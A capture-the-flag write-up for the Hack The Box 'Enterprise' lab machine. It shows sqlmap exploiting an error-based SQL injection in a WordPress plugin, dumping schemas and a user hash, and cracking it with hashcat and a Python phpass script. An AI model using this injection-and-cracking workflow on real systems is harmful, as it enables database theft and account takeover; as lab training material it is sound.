u505@kali:~/HTB/Machines/Enterprise$ cat postlist
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=1
Hello world!
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=3
Auto Draft
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=4
Espresso
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=5
Sandwich
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=6
Coffee
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=7
Home
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=8
About
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=9
Contact
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=10
Blog
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=11
A homepage section
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=13
enterprise_header
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=14
Espresso
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=15
Sandwich
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=16
Coffee
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=23
enterprise_header
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=24
cropped-enterprise_header-1.jpg
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=30
Home
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=34
Yelp
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=35
Facebook
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=36
Twitter
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=37
Instagram
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=38
Email
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=40
Hello world!
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=51
Stardate 49827.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=52
Stardate 49827.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=53
Stardate 50893.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=54
Stardate 50893.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=55
Stardate 52179.4
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=56
Stardate 52179.4
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=57
Stardate 55132.2
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=58
Stardate 55132.2
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=66
Passwords
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=67
Passwords
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=68
Passwords
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=69
YAYAYAYAY.
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=70
YAYAYAYAY.
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=71
test
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=78
YAYAYAYAY.
Posts 66 to 68, all titled Passwords, look very interesting.
SQLMap
The query parameter of lcars_db.php is injectable, so hand it to sqlmap. The request is saved to a file; the Host header in it (enterprise.htb) is what sqlmap keys its session and output directory on, which is why the results below land under enterprise.htb. The runs shown resume from a stored session, so sqlmap's initial detection phase is not reproduced here; the injection point it found is error-based (the FLOOR(RAND(0)*2) GROUP BY duplicate-key technique).
u505@kali:~/HTB/Machines/Enterprise$ cat lcars_db.req
GET /wp-content/plugins/lcars/lcars_db.php?query=abc HTTP/1.1
Host: enterprise.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Databases enumeration
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req --dbs
sqlmap {1.4.5#stable} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:01:43 /2020-05-25/
[13:01:43] [INFO] parsing HTTP request from 'lcars_db.req'
[13:01:43] [INFO] resuming back-end DBMS 'mysql'
[13:01:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[13:01:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[13:01:44] [INFO] fetching database names
[13:01:44] [INFO] resumed: 'information_schema'
[13:01:44] [INFO] resumed: 'joomla'
[13:01:44] [INFO] resumed: 'joomladb'
[13:01:44] [INFO] resumed: 'mysql'
[13:01:44] [INFO] resumed: 'performance_schema'
[13:01:44] [INFO] resumed: 'sys'
[13:01:44] [INFO] resumed: 'wordpress'
[13:01:44] [INFO] resumed: 'wordpressdb'
available databases [8]:
[*] information_schema
[*] joomla
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[*] wordpressdb
[13:01:44] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 13:01:44 /2020-05-25/
Wordpress schema
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req -D wordpress --schema
sqlmap {1.4.5#stable} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:03:14 /2020-05-25/
[12:03:14] [INFO] parsing HTTP request from 'lcars_db.req'
[12:03:14] [INFO] resuming back-end DBMS 'mysql'
[12:03:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[12:03:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[12:03:15] [INFO] enumerating database management system schema
[12:03:15] [INFO] fetching tables for database: 'wordpress'
[12:03:15] [INFO] resumed: 'wp_commentmeta'
...
Database: wordpress
Table: wp_commentmeta
[4 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| comment_id | bigint(20) unsigned |
| meta_id    | bigint(20) unsigned |
| meta_key   | varchar(255)        |
| meta_value | longtext            |
+------------+---------------------+

Database: wordpress
Table: wp_usermeta
[4 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| meta_key   | varchar(255)        |
| meta_value | longtext            |
| umeta_id   | bigint(20) unsigned |
| user_id    | bigint(20) unsigned |
+------------+---------------------+

Database: wordpress
Table: wp_term_relationships
[3 columns]
+------------------+---------------------+
| Column           | Type                |
+------------------+---------------------+
| object_id        | bigint(20) unsigned |
| term_order       | int(11)             |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+

Database: wordpress
Table: wp_comments
[15 columns]
+----------------------+---------------------+
| Column               | Type                |
+----------------------+---------------------+
| comment_agent        | varchar(255)        |
| comment_approved     | varchar(20)         |
| comment_author       | tinytext            |
| comment_author_email | varchar(100)        |
| comment_author_IP    | varchar(100)        |
| comment_author_url   | varchar(200)        |
| comment_content      | text                |
| comment_date         | datetime            |
| comment_date_gmt     | datetime            |
| comment_ID           | bigint(20) unsigned |
| comment_karma        | int(11)             |
| comment_parent       | bigint(20) unsigned |
| comment_post_ID      | bigint(20) unsigned |
| comment_type         | varchar(20)         |
| user_id              | bigint(20) unsigned |
+----------------------+---------------------+

Database: wordpress
Table: wp_terms
[4 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| name       | varchar(200)        |
| slug       | varchar(200)        |
| term_group | bigint(10)          |
| term_id    | bigint(20) unsigned |
+------------+---------------------+

Database: wordpress
Table: wp_postmeta
[4 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| meta_id    | bigint(20) unsigned |
| meta_key   | varchar(255)        |
| meta_value | longtext            |
| post_id    | bigint(20) unsigned |
+------------+---------------------+

Database: wordpress
Table: wp_options
[4 columns]
+--------------+---------------------+
| Column       | Type                |
+--------------+---------------------+
| autoload     | varchar(20)         |
| option_id    | bigint(20) unsigned |
| option_name  | varchar(191)        |
| option_value | longtext            |
+--------------+---------------------+

Database: wordpress
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| display_name        | varchar(250)        |
| user_activation_key | varchar(255)        |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(255)        |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+

Database: wordpress
Table: wp_termmeta
[4 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| meta_id    | bigint(20) unsigned |
| meta_key   | varchar(255)        |
| meta_value | longtext            |
| term_id    | bigint(20) unsigned |
+------------+---------------------+

Database: wordpress
Table: wp_posts
[23 columns]
+-----------------------+---------------------+
| Column                | Type                |
+-----------------------+---------------------+
| ID                    | bigint(20) unsigned |
| comment_count         | bigint(20)          |
| comment_status        | varchar(20)         |
| guid                  | varchar(255)        |
| menu_order            | int(11)             |
| ping_status           | varchar(20)         |
| pinged                | text                |
| post_author           | bigint(20) unsigned |
| post_content          | longtext            |
| post_content_filtered | longtext            |
| post_date             | datetime            |
| post_date_gmt         | datetime            |
| post_excerpt          | text                |
| post_mime_type        | varchar(100)        |
| post_modified         | datetime            |
| post_modified_gmt     | datetime            |
| post_name             | varchar(200)        |
| post_parent           | bigint(20) unsigned |
| post_password         | varchar(255)        |
| post_status           | varchar(20)         |
| post_title            | text                |
| post_type             | varchar(20)         |
| to_ping               | text                |
+-----------------------+---------------------+

Database: wordpress
Table: wp_term_taxonomy
[6 columns]
+------------------+---------------------+
| Column           | Type                |
+------------------+---------------------+
| count            | bigint(20)          |
| description      | longtext            |
| parent           | bigint(20) unsigned |
| taxonomy         | varchar(32)         |
| term_id          | bigint(20) unsigned |
| term_taxonomy_id | bigint(20) unsigned |
+------------------+---------------------+

Database: wordpress
Table: wp_links
[13 columns]
+------------------+---------------------+
| Column           | Type                |
+------------------+---------------------+
| link_description | varchar(255)        |
| link_id          | bigint(20) unsigned |
| link_image       | varchar(255)        |
| link_name        | varchar(255)        |
| link_notes       | mediumtext          |
| link_owner       | bigint(20) unsigned |
| link_rating      | int(11)             |
| link_rel         | varchar(255)        |
| link_rss         | varchar(255)        |
| link_target      | varchar(25)         |
| link_updated     | datetime            |
| link_url         | varchar(255)        |
| link_visible     | varchar(20)         |
+------------------+---------------------+
[12:03:15] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 12:03:15 /2020-05-25/
Wordpress table users
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req -D wordpress -T wp_users -C display_name,user_email,user_login,user_pass --dump
sqlmap {1.4.5#stable} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:05:34 /2020-05-25/
[12:05:34] [INFO] parsing HTTP request from 'lcars_db.req'
[12:05:34] [INFO] resuming back-end DBMS 'mysql'
[12:05:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[12:05:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[12:05:36] [INFO] fetching entries of column(s) 'display_name, user_email, user_login, user_pass' for table 'wp_users' in database 'wordpress'
[12:05:36] [INFO] retrieved: 'william.riker'
[12:05:36] [INFO] retrieved: 'william.riker@enterprise.htb'
[12:05:36] [INFO] retrieved: 'william.riker'
[12:05:36] [INFO] retrieved: '$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.'
[12:05:36] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: wordpress
Table: wp_users
[1 entry]
+---------------+------------------------------+---------------+------------------------------------+
| display_name  | user_email                   | user_login    | user_pass                          |
+---------------+------------------------------+---------------+------------------------------------+
| william.riker | william.riker@enterprise.htb | william.riker | $P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2. |
+---------------+------------------------------+---------------+------------------------------------+
[12:05:44] [INFO] table 'wordpress.wp_users' dumped to CSV file '/home/u505/.sqlmap/output/enterprise.htb/dump/wordpress/wp_users.csv' [12:05:44] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 12:05:44 /2020-05-25/
We try to crack this hash. hashid identifies the $P$ prefix as a phpass portable hash, the format WordPress (and Joomla, phpBB3) uses, which is hashcat mode 400.
u505@kali:~/HTB/Machines/Enterprise$ cat wpress.hash
william.riker:$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.
u505@kali:~/HTB/Machines/Enterprise$ hashid '$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.'
Analyzing '$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.'
[+] Wordpress ≥ v2.6.2
[+] Joomla ≥ v2.5.18
[+] PHPass' Portable Hash
Run hashcat in mode 400 against rockyou (--username tells it to skip the "william.riker:" prefix in the hash file):
u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 400 --username wpress.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.
Time.Started.....: Thu May 21 19:21:14 2020 (1 min, 12 secs)
Time.Estimated...: Thu May 21 19:22:26 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   199.6 kH/s (3.91ms) @ Accel:256 Loops:128 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8064-8192
Candidates.#1....: $HEX[2321676f7468] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 67c Util: 63% Core:1202MHz Mem:2505MHz Bus:16
Started: Thu May 21 19:21:10 2020 Stopped: Thu May 21 19:22:27 2020
No luck.
Wordpress table wp_posts
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req --dump -D wordpress -T wp_posts -C ID,post_title,post_content
...
[12:10:03] [INFO] table 'wordpress.wp_posts' dumped to CSV file '/home/u505/.sqlmap/output/enterprise.htb/dump/wordpress/wp_posts.csv'
[12:10:03] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'

[*] ending @ 12:10:03 /2020-05-25/

Three rows of the dump (IDs 66 to 68, all titled "Passwords") contain a list of passwords someone pasted into a post; sqlmap writes the post's line breaks as literal \r\n.

u505@kali:~/HTB/Machines/Enterprise$ grep "6[6-8]," /home/u505/.sqlmap/output/enterprise.htb/dump/wordpress/wp_posts.csv
66,Passwords,Needed somewhere to put some passwords quickly\r\n\r\nZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nZD3YxfnSjezg67JZ\r\n\r\nu*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n
67,Passwords,Needed somewhere to put some passwords quickly\r\n\r\nZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nu*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n
68,Passwords,Needed somewhere to put some passwords quickly\r\n\r\nZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nZD3YxfnSjezg67JZ\r\n\r\nu*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n
We store these passwords in a file.

u505@kali:~/HTB/Machines/Enterprise$ cat pass.txt
ZxJyhGem4k338S2Y
enterprisencc170
ZD3YxfnSjezg67JZ
u*Z14ru0p#ttj83zS6

We run hashcat again with this file as the wordlist.

u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 400 --username wpress.hash pass.txt
hashcat (v5.1.0) starting...
...
u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 400 --username wpress.hash pass.txt --show
william.riker:$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.:u*Z14ru0p#ttj83zS6

The hash for william.riker resolves to u*Z14ru0p#ttj83zS6.
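To see what hashcat mode 400 actually did here, the following is an added example (not code from this write-up) that re-implements the phpass portable-hash algorithm (crypt_private from the public PHPass library: an 8-byte salt, MD5 iterated 2^cost times, and phpass' own base64 alphabet) and runs the same four candidates from wp_posts against william.riker's hash. The hash and the grep row are the values printed above; the function and variable names are mine.

```python
"""PHPass portable-hash check for the '$P$' format WordPress uses.

Added example, not code from the original write-up.  Re-implements
phpass crypt_private()/encode64() so the hashcat result above can be
verified offline against the candidates lifted from wp_posts.
"""
import hashlib
import hmac
from typing import List, Optional

# phpass' own base64 alphabet (not the RFC 4648 one)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Values copied from the sqlmap and grep output above.
RIKER_HASH = "$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2."
WP_POSTS_ROW = (  # post 66 of the wp_posts dump, as printed by grep
    r"66,Passwords,Needed somewhere to put some passwords quickly\r\n\r\n"
    r"ZxJyhGem4k338S2Y\r\n\r\nenterprisencc170\r\n\r\nZD3YxfnSjezg67JZ\r\n\r\n"
    r"u*Z14ru0p#ttj83zS6\r\n\r\n \r\n\r\n"
)


def candidates_from_row(row: str) -> List[str]:
    """Split post_content on the literal '\\r\\n' separators sqlmap wrote to the CSV."""
    content = row.split(",", 2)[2]  # columns: ID,post_title,post_content
    parts = [p.strip() for p in content.split(r"\r\n")]
    return [p for p in parts[1:] if p]  # drop the prose line and blank lines


def _encode64(data: bytes) -> str:
    """phpass encode64(): 3 bytes -> 4 chars, low 6 bits first."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_cost(setting: str) -> int:
    """Iteration count encoded in the 4th character: 'B' -> 2**13 = 8192."""
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("phpass cost out of range")
    return 1 << count_log2


def phpass_hash(password: str, setting: str) -> str:
    """Recompute a '$P$'/'$H$' hash for password using setting's cost and salt."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    salt = setting[4:12].encode()
    if len(salt) != 8:
        raise ValueError("truncated salt")
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(phpass_cost(setting)):  # raw MD5 chained 2**cost times
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest)


def phpass_verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


def first_match(stored: str, candidates: List[str]) -> Optional[str]:
    """Tiny dictionary attack: what hashcat -m 400 did with pass.txt."""
    for cand in candidates:
        if phpass_verify(cand, stored):
            return cand
    return None


if __name__ == "__main__":
    cands = candidates_from_row(WP_POSTS_ROW)
    print("cost:", phpass_cost(RIKER_HASH), "candidates:", cands)
    print("william.riker ->", first_match(RIKER_HASH, cands))
```

The cost character 'B' decodes to 8192 iterations, which is exactly the "Iteration:8064-8192" hashcat reported in its status line; rockyou failed not because the algorithm is strong but because the password is a random string that only exists in that post.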
Joomla schema
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req -D joomladb --schema ... [13:26:50] [INFO] resumed: 'float unsigned' Database: joomladb Table: edz2g_finder_tokens_aggregate [11 columns] +----------------+---------------------+ | Column | Type | +----------------+---------------------+ | language | char(3) | | common | tinyint(1) unsigned | | context | tinyint(1) unsigned | | context_weight | float unsigned | | map_suffix | char(1) | | phrase | tinyint(1) unsigned | | stem | varchar(75) | | term | varchar(75) | | term_id | int(10) unsigned | | term_weight | float unsigned | | total_weight | float unsigned | +----------------+---------------------+
Database: joomladb Table: edz2g_redirect_links [10 columns] +---------------+------------------+ | Column | Type | +---------------+------------------+ | comment | varchar(255) | | header | smallint(3) | | id | int(10) unsigned | | created_date | datetime | | hits | int(10) unsigned | | modified_date | datetime | | new_url | varchar(2048) | | old_url | varchar(2048) | | published | tinyint(4) | | referer | varchar(2048) | +---------------+------------------+
Database: joomladb Table: edz2g_tags [30 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | id | int(10) unsigned | | language | char(7) | | level | int(10) unsigned | | path | varchar(400) | | version | int(10) unsigned | | alias | varchar(400) | | checked_out | int(11) unsigned | | checked_out_time | datetime | | created_by_alias | varchar(255) | | created_time | datetime | | created_user_id | int(10) unsigned | | description | mediumtext | | hits | int(10) unsigned | | images | text | | lft | int(11) | | metadata | varchar(2048) | | metadesc | varchar(1024) | | metakey | varchar(1024) | | modified_time | datetime | | modified_user_id | int(10) unsigned | | note | varchar(255) | | params | text | | parent_id | int(10) unsigned | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | rgt | int(11) | | title | varchar(255) | | urls | text | +------------------+------------------+
Database: joomladb Table: edz2g_extensions [18 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | element | varchar(100) | | name | varchar(100) | | ordering | int(11) | | state | int(11) | | type | varchar(20) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | client_id | tinyint(3) | | custom_data | text | | enabled | tinyint(3) | | extension_id | int(11) | | folder | varchar(100) | | manifest_cache | text | | package_id | int(11) | | params | text | | protected | tinyint(3) | | system_data | text | +------------------+------------------+
Database: joomladb Table: edz2g_content [30 columns] +------------------+---------------------+ | Column | Type | +------------------+---------------------+ | access | int(10) unsigned | | fulltext | mediumtext | | id | int(10) unsigned | | language | char(7) | | ordering | int(11) | | state | tinyint(3) | | version | int(10) unsigned | | alias | varchar(400) | | asset_id | int(10) unsigned | | attribs | varchar(5120) | | catid | int(10) unsigned | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | featured | tinyint(3) unsigned | | hits | int(10) unsigned | | images | text | | introtext | mediumtext | | metadata | text | | metadesc | text | | metakey | text | | modified | datetime | | modified_by | int(10) unsigned | | publish_down | datetime | | publish_up | datetime | | title | varchar(255) | | urls | text | | xreference | varchar(50) | +------------------+---------------------+
Database: joomladb Table: edz2g_finder_links_terms5 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_tokens [7 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | language | char(3) | | common | tinyint(1) unsigned | | context | tinyint(1) unsigned | | phrase | tinyint(1) unsigned | | stem | varchar(75) | | term | varchar(75) | | weight | float unsigned | +----------+---------------------+
Database: joomladb Table: edz2g_newsfeeds [30 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | id | int(10) unsigned | | language | char(7) | | link | varchar(2048) | | name | varchar(100) | | ordering | int(11) | | version | int(10) unsigned | | alias | varchar(400) | | cache_time | int(10) unsigned | | catid | int(11) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | created | datetime | | created_by | int(10) unsigned | | created_by_alias | varchar(255) | | description | text | | hits | int(10) unsigned | | images | text | | metadata | text | | metadesc | text | | metakey | text | | modified | datetime | | modified_by | int(10) unsigned | | numarticles | int(10) unsigned | | params | text | | publish_down | datetime | | publish_up | datetime | | published | tinyint(1) | | rtl | tinyint(4) | | xreference | varchar(50) | +------------------+------------------+
Database: joomladb Table: edz2g_core_log_searches [2 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | hits | int(10) unsigned | | search_term | varchar(128) | +-------------+------------------+
Database: joomladb Table: edz2g_postinstall_messages [14 columns] +------------------------+---------------------+ | Column | Type | +------------------------+---------------------+ | action | varchar(255) | | type | varchar(10) | | action_file | varchar(255) | | action_key | varchar(255) | | condition_file | varchar(255) | | condition_method | varchar(255) | | description_key | varchar(255) | | enabled | tinyint(3) | | extension_id | bigint(20) | | language_client_id | tinyint(3) | | language_extension | varchar(255) | | postinstall_message_id | bigint(20) unsigned | | title_key | varchar(255) | | version_introduced | varchar(50) | +------------------------+---------------------+
Database: joomladb Table: edz2g_content_types [8 columns] +-------------------------+------------------+ | Column | Type | +-------------------------+------------------+ | table | varchar(255) | | content_history_options | varchar(5120) | | field_mappings | text | | router | varchar(255) | | rules | text | | type_alias | varchar(400) | | type_id | int(10) unsigned | | type_title | varchar(255) | +-------------------------+------------------+
Database: joomladb Table: edz2g_fields_groups [16 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(11) | | id | int(10) unsigned | | language | char(7) | | ordering | int(11) | | state | tinyint(1) | | asset_id | int(10) unsigned | | checked_out | int(11) | | checked_out_time | datetime | | context | varchar(255) | | created | datetime | | created_by | int(10) unsigned | | description | text | | modified | datetime | | modified_by | int(10) unsigned | | note | varchar(255) | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_finder_links_terms6 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_terms4 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links [19 columns] +--------------------+------------------+ | Column | Type | +--------------------+------------------+ | access | int(5) | | language | varchar(8) | | object | mediumblob | | state | int(5) | | description | text | | end_date | datetime | | indexdate | datetime | | link_id | int(10) unsigned | | list_price | double unsigned | | md5sum | varchar(32) | | publish_end_date | datetime | | publish_start_date | datetime | | published | tinyint(1) | | route | varchar(255) | | sale_price | double unsigned | | start_date | datetime | | title | varchar(400) | | type_id | int(11) | | url | varchar(255) | +--------------------+------------------+
Database: joomladb Table: edz2g_messages_cfg [3 columns] +-----------+------------------+ | Column | Type | +-----------+------------------+ | cfg_name | varchar(100) | | cfg_value | varchar(255) | | user_id | int(10) unsigned | +-----------+------------------+
Database: joomladb Table: edz2g_fields_categories [2 columns] +-------------+---------+ | Column | Type | +-------------+---------+ | category_id | int(11) | | field_id | int(11) | +-------------+---------+
Database: joomladb Table: edz2g_finder_links_termse [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_terms [9 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | language | char(3) | | common | tinyint(1) unsigned | | links | int(10) | | phrase | tinyint(1) unsigned | | soundex | varchar(75) | | stem | varchar(75) | | term | varchar(75) | | term_id | int(10) unsigned | | weight | float unsigned | +----------+---------------------+
Database: joomladb Table: edz2g_banner_clients [14 columns] +-------------------+------------------+ | Column | Type | +-------------------+------------------+ | id | int(11) | | name | varchar(255) | | state | tinyint(3) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | contact | varchar(255) | | email | varchar(255) | | extrainfo | text | | metakey | text | | metakey_prefix | varchar(400) | | own_prefix | tinyint(4) | | purchase_type | tinyint(4) | | track_clicks | tinyint(4) | | track_impressions | tinyint(4) | +-------------------+------------------+
Database: joomladb Table: edz2g_finder_types [3 columns] +--------+------------------+ | Column | Type | +--------+------------------+ | id | int(10) unsigned | | mime | varchar(100) | | title | varchar(100) | +--------+------------------+
